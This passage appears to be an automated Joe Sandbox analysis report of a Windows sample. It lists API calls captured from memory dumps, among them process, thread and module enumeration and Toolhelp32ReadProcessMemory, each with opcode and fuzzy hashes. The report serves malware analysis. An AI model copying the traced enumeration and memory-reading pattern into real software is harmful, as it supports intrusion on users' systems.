                                                                                                                    • Instruction Fuzzy Hash: 4AC08CF02222011A6F5066BC2CC4249528E8904238B640A61B43CC73E2D322DCA36820
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3341692771-0
                                                                                                                    • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                    • Instruction ID: a3adf5a57ee28e6e2dab2f755e44b3ebff12ec3653b0bf3b873defc3a9b41af1
                                                                                                                    • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                    • Instruction Fuzzy Hash: 7BC012B26002305BEF215699ACC075262CCDB05298F1440A1B404D7355E360DC00C6B0
                                                                                                                    APIs
                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,02DBC350,00000000,00000001), ref: 02DBC36C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Eventtime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2982266575-0
                                                                                                                    • Opcode ID: f26aabbbe9244d642141f1e01ecf7c61e20eba1f26f3288ae5c4e6333a889ee3
                                                                                                                    • Instruction ID: 2e9d2187351c79f4141dbf6fe335b87d67cace6e8196084dfec716d2b463c1cc
                                                                                                                    • Opcode Fuzzy Hash: f26aabbbe9244d642141f1e01ecf7c61e20eba1f26f3288ae5c4e6333a889ee3
                                                                                                                    • Instruction Fuzzy Hash: 9DC048F17A03006AFA1196A99CD2F66669DE709B51F540412BA05AA3D1D2A26C114E68
                                                                                                                    APIs
                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D94C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2525500382-0
                                                                                                                    • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                    • Instruction ID: 2b40b518b8e32ae2d61e8a9a2e62f842e7ef0957f8938ab92b75cef3b8c4bc6c
                                                                                                                    • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                    • Instruction Fuzzy Hash: C6B0923420820229EF1826A20E11736004C4B4128AF840051BE58C82D2EA00CC02C875
                                                                                                                    APIs
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02D94C57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3341692771-0
                                                                                                                    • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                    • Instruction ID: bc07f8b6eedefe87930551b36a0e7b9b7e05d14c10244d987971a123a1a117d3
                                                                                                                    • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                    • Instruction Fuzzy Hash: B3A011B80082030A8F0A32A8002002A2222AEC0280B88C0A822000A20A8A2A8802E830
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D91A03,?,02D92000), ref: 02D915E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 2fbd97f54d9fa735bcbb7f6e18a403181ef2d06a850e37102de4812fcfbd6323
                                                                                                                    • Instruction ID: 2d115b918062f4f470cd242a0961419ee81688f6869fa46376182c295e56050d
                                                                                                                    • Opcode Fuzzy Hash: 2fbd97f54d9fa735bcbb7f6e18a403181ef2d06a850e37102de4812fcfbd6323
                                                                                                                    • Instruction Fuzzy Hash: 11F049F0B813004FDB0ADFBA99417057AE2EB8A344F508579E609DB3C8E77188428B10
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D92000), ref: 02D916A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 0dface921df768471dc1bc8214818c4f73879463149f5b74b9219ce49e401b68
                                                                                                                    • Instruction ID: bc59c34e7550b573dc38f042df7893b628267e188726136d7cecf17a6a8f73fc
                                                                                                                    • Opcode Fuzzy Hash: 0dface921df768471dc1bc8214818c4f73879463149f5b74b9219ce49e401b68
                                                                                                                    • Instruction Fuzzy Hash: 48F090B2A806956BDB119E5A9C80782BB98FB00314F454139F90897340D770AC50CB94
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02D91704
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: 725fcef0cedc5fc13c90a8f6d85cd0ba0952b8291f37868107b0fb157ea5bd46
                                                                                                                    • Instruction ID: 6ee48f133f00fc779a8da34df6fa5d48e96701894b1d6b4e695ab23f9186088c
                                                                                                                    • Opcode Fuzzy Hash: 725fcef0cedc5fc13c90a8f6d85cd0ba0952b8291f37868107b0fb157ea5bd46
                                                                                                                    • Instruction Fuzzy Hash: 1EE08C76340313AFEF105E7A5D80B12ABDCEB49664F284476F649DB381D2A0EC108B70
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02DAADA3,?,?,02DAAE35,00000000,02DAAF11), ref: 02DAAB30
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02DAAB48
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02DAAB5A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02DAAB6C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02DAAB7E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02DAAB90
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02DAABA2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02DAABB4
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02DAABC6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02DAABD8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02DAABEA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02DAABFC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02DAAC0E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02DAAC20
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02DAAC32
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02DAAC44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02DAAC56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                    • API String ID: 667068680-597814768
                                                                                                                    • Opcode ID: 16e85ae806147cb032cb46a4bde57bc1f092d847706e967c57b037fa9f11fa3e
                                                                                                                    • Instruction ID: b6eaaedbc40cf437531e44461e34e880755682ce423dd26327cb733a3957eed9
                                                                                                                    • Opcode Fuzzy Hash: 16e85ae806147cb032cb46a4bde57bc1f092d847706e967c57b037fa9f11fa3e
                                                                                                                    • Instruction Fuzzy Hash: BE317CB5A806909FFF10EFA5E895E2977B9EB15701B400AA5B801DF304E774EC94CF61
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95925
                                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D9593C
                                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 02D9596C
                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D959D0
                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A06
                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A19
                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A2B
                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000,02DBE790), ref: 02D95A37
                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C,02D90000), ref: 02D95A6B
                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D9737C), ref: 02D95A77
                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D95A99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                    • Opcode ID: 1801d23f05834e5e86922f6f8f6037bcd16c09f42b24ab3c6aaa5f32d9fd54a3
                                                                                                                    • Instruction ID: d70846763796a3aed3edd41c459bca0bbe84ef737484a25debeb388db899a08a
                                                                                                                    • Opcode Fuzzy Hash: 1801d23f05834e5e86922f6f8f6037bcd16c09f42b24ab3c6aaa5f32d9fd54a3
                                                                                                                    • Instruction Fuzzy Hash: DF414971D0421AAFDF11EAA8DC88A9EB3BDEB09350F5445A5B148E7341E730EE44CF64
                                                                                                                    APIs
                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D95BE8
                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D95BF5
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D95BFB
                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D95C26
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95C6D
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95C7D
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95CA5
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95CB5
                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D95CDB
                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D95CEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                                    • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                    • Instruction ID: 5aa5487cedbdba7a185217707cd9fca82b0e2d5471336f4b86dc124b6860293f
                                                                                                                    • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                    • Instruction Fuzzy Hash: 15317571E4026D2AEF26D6B49C46FDE77AD9B04380F8441B1BA48E6281D674DE84CF60
                                                                                                                    APIs
                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D97FF5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1705453755-0
                                                                                                                    • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                    • Instruction ID: fd8526501ee46944da8aa0f8d2cab771e5ea21b8732d24fcbcc19c1f5da71dc8
                                                                                                                    • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                    • Instruction Fuzzy Hash: A411BEB5A00209AF9B04CF99C8819AFF7F9EFC8300F54C569A509E7254E6719E018BA0
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                    • Instruction ID: 26bf9909e9f9f435f08386689ceea02c509e2bcdac98b531653df466ef0e98c4
                                                                                                                    • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                    • Instruction Fuzzy Hash: ECE0D87270022417DB11A5989C81EFA735DDB58310F0042BABE05C7385EDE1DE804BF4
                                                                                                                    APIs
                                                                                                                    • GetVersionExA.KERNEL32(?,02DBD106,00000000,02DBD11E), ref: 02D9B79A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: 9913a7d43f97173169acd96ede9a5d8bc25c18fda94eb8ea0d31b8309e8a442f
                                                                                                                    • Instruction ID: d411b850f0d3eb05ac1f7ac4a57c5bf8d858c3cf17d1bafbff86062d0a83a5c3
                                                                                                                    • Opcode Fuzzy Hash: 9913a7d43f97173169acd96ede9a5d8bc25c18fda94eb8ea0d31b8309e8a442f
                                                                                                                    • Instruction Fuzzy Hash: 09F0F474904301EFD741DF28E45065577E9FB48704F808E29F69987B80EB399C14DBA2
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02D9BE72,00000000,02D9C08B,?,?,00000000,00000000), ref: 02D9A823
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                    • Instruction ID: bd160b2deee9102eb4f7c3ed40b6b75a0d4c75a6470d6c112cbf7f14a9bd6e75
                                                                                                                    • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                    • Instruction Fuzzy Hash: 0AD05EB330E2A02AAB10925A2D84D7B5AECCAC57A1F00407ABA88C6301D600CC07DBB1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
